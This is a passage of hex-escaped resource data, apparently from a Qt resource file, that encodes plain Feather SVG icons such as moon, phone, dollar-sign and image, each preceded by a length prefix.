\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x70\x65\x61\x6b\
\x65\x72\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x34\x22\x20\
\x79\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\x22\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\x72\x78\x3d\
\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\
\x22\x20\x63\x79\x3d\x22\x31\x34\x22\x20\x72\x3d\x22\x34\x22\x3e\
\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\
\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x36\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x19\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x6f\x6e\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\x31\x32\
\x2e\x37\x39\x41\x39\x20\x39\x20\x30\x20\x31\x20\x31\x20\x31\x31\
\x2e\x32\x31\x20\x33\x20\x37\x20\x37\x20\x30\x20\x30\x20\x30\x20\
\x32\x31\x20\x31\x32\x2e\x37\x39\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xb1\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x7a\x61\x70\x2d\x6f\
\x66\x66\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x31\x32\x2e\x34\x31\x20\x36\x2e\x37\x35\
\x20\x31\x33\x20\x32\x20\x31\x30\x2e\x35\x37\x20\x34\x2e\x39\x32\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\
\x38\x2e\x35\x37\x20\x31\x32\x2e\x39\x31\x20\x32\x31\x20\x31\x30\
\x20\x31\x35\x2e\x36\x36\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x38\x20\x38\x20\x33\x20\x31\x34\
\x20\x31\x32\x20\x31\x34\x20\x31\x31\x20\x32\x32\x20\x31\x36\x20\
\x31\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\
\x31\x22\x20\x78\x32\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x32\
\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x02\x40\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x2d\x63\x61\x6c\x6c\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x31\x35\x2e\x30\x35\x20\x35\x41\x35\x20\x35\x20\x30\x20\x30\
\x20\x31\x20\x31\x39\x20\x38\x2e\x39\x35\x4d\x31\x35\x2e\x30\x35\
\x20\x31\x41\x39\x20\x39\x20\x30\x20\x30\x20\x31\x20\x32\x33\x20\
\x38\x2e\x39\x34\x6d\x2d\x31\x20\x37\x2e\x39\x38\x76\x33\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2e\x31\x38\x20\x32\x20\
\x31\x39\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\
\x31\x2d\x38\x2e\x36\x33\x2d\x33\x2e\x30\x37\x20\x31\x39\x2e\x35\
\x20\x31\x39\x2e\x35\x20\x30\x20\x30\x20\x31\x2d\x36\x2d\x36\x20\
\x31\x39\x2e\x37\x39\x20\x31\x39\x2e\x37\x39\x20\x30\x20\x30\x20\
\x31\x2d\x33\x2e\x30\x37\x2d\x38\x2e\x36\x37\x41\x32\x20\x32\x20\
\x30\x20\x30\x20\x31\x20\x34\x2e\x31\x31\x20\x32\x68\x33\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x31\x2e\x37\x32\x20\
\x31\x32\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\
\x30\x20\x2e\x37\x20\x32\x2e\x38\x31\x20\x32\x20\x32\x20\x30\x20\
\x30\x20\x31\x2d\x2e\x34\x35\x20\x32\x2e\x31\x31\x4c\x38\x2e\x30\
\x39\x20\x39\x2e\x39\x31\x61\x31\x36\x20\x31\x36\x20\x30\x20\x30\
\x20\x30\x20\x36\x20\x36\x6c\x31\x2e\x32\x37\x2d\x31\x2e\x32\x37\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2e\x31\x31\x2d\
\x2e\x34\x35\x20\x31\x32\x2e\x38\x34\x20\x31\x32\x2e\x38\x34\x20\
\x30\x20\x30\x20\x30\x20\x32\x2e\x38\x31\x2e\x37\x41\x32\x20\x32\
\x20\x30\x20\x30\x20\x31\x20\x32\x32\x20\x31\x36\x2e\x39\x32\x7a\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x18\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x71\x75\x61\x72\
\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\
\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\
\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\
\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x02\x08\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x68\x6f\x6e\x65\
\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x32\x20\x31\
\x36\x2e\x39\x32\x76\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x2e\x31\x38\x20\x32\x20\x31\x39\x2e\x37\x39\x20\x31\x39\
\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x38\x2e\x36\x33\x2d\x33\
\x2e\x30\x37\x20\x31\x39\x2e\x35\x20\x31\x39\x2e\x35\x20\x30\x20\
\x30\x20\x31\x2d\x36\x2d\x36\x20\x31\x39\x2e\x37\x39\x20\x31\x39\
\x2e\x37\x39\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x30\x37\x2d\x38\
\x2e\x36\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x34\x2e\
\x31\x31\x20\x32\x68\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x31\x2e\x37\x32\x20\x31\x32\x2e\x38\x34\x20\x31\x32\
\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x2e\x37\x20\x32\x2e\x38\
\x31\x20\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x2e\x34\x35\x20\
\x32\x2e\x31\x31\x4c\x38\x2e\x30\x39\x20\x39\x2e\x39\x31\x61\x31\
\x36\x20\x31\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x36\x6c\x31\
\x2e\x32\x37\x2d\x31\x2e\x32\x37\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x31\x20\x32\x2e\x31\x31\x2d\x2e\x34\x35\x20\x31\x32\x2e\x38\
\x34\x20\x31\x32\x2e\x38\x34\x20\x30\x20\x30\x20\x30\x20\x32\x2e\
\x38\x31\x2e\x37\x41\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x32\x20\x31\x36\x2e\x39\x32\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x35\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x74\x6f\x70\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x39\x22\x20\x79\x3d\x22\x39\
\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x36\x22\x20\x68\x65\x69\x67\
\x68\x74\x3d\x22\x36\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x63\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x72\x2d\x63\
\x68\x61\x72\x74\x2d\x32\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x38\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\
\x3d\x22\x31\x38\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x31\
\x32\x22\x20\x79\x32\x3d\x22\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x36\x22\x20\x79\x31\
\x3d\x22\x32\x30\x22\x20\x78\x32\x3d\x22\x36\x22\x20\x79\x32\x3d\
\x22\x31\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\x85\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x65\x68\x22\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\
\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\x22\x3e\x3c\
\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x35\x22\x20\x78\x32\x3d\
\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x39\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x39\x2e\x30\x31\
\x22\x20\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x35\x22\x20\x79\x31\
\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x35\x2e\x30\x31\x22\x20\
\x79\x32\x3d\x22\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x4e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x6f\x6c\x6c\x61\
\x72\x2d\x73\x69\x67\x6e\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\
\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x37\
\x20\x35\x48\x39\x2e\x35\x61\x33\x2e\x35\x20\x33\x2e\x35\x20\x30\
\x20\x30\x20\x30\x20\x30\x20\x37\x68\x35\x61\x33\x2e\x35\x20\x33\
\x2e\x35\x20\x30\x20\x30\x20\x31\x20\x30\x20\x37\x48\x36\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x71\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6d\x61\x67\x65\
\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x33\x22\x20\x79\x3d\
\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x38\x22\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x38\x22\x20\x72\x78\x3d\x22\x32\
\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x38\x2e\x35\x22\
\x20\x63\x79\x3d\x22\x38\x2e\x35\x22\x20\x72\x3d\x22\x31\x2e\x35\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x32\x31\x20\
\x31\x35\x20\x31\x36\x20\x31\x30\x20\x35\x20\x32\x31\x22\x3e\x3c\
\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x3a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
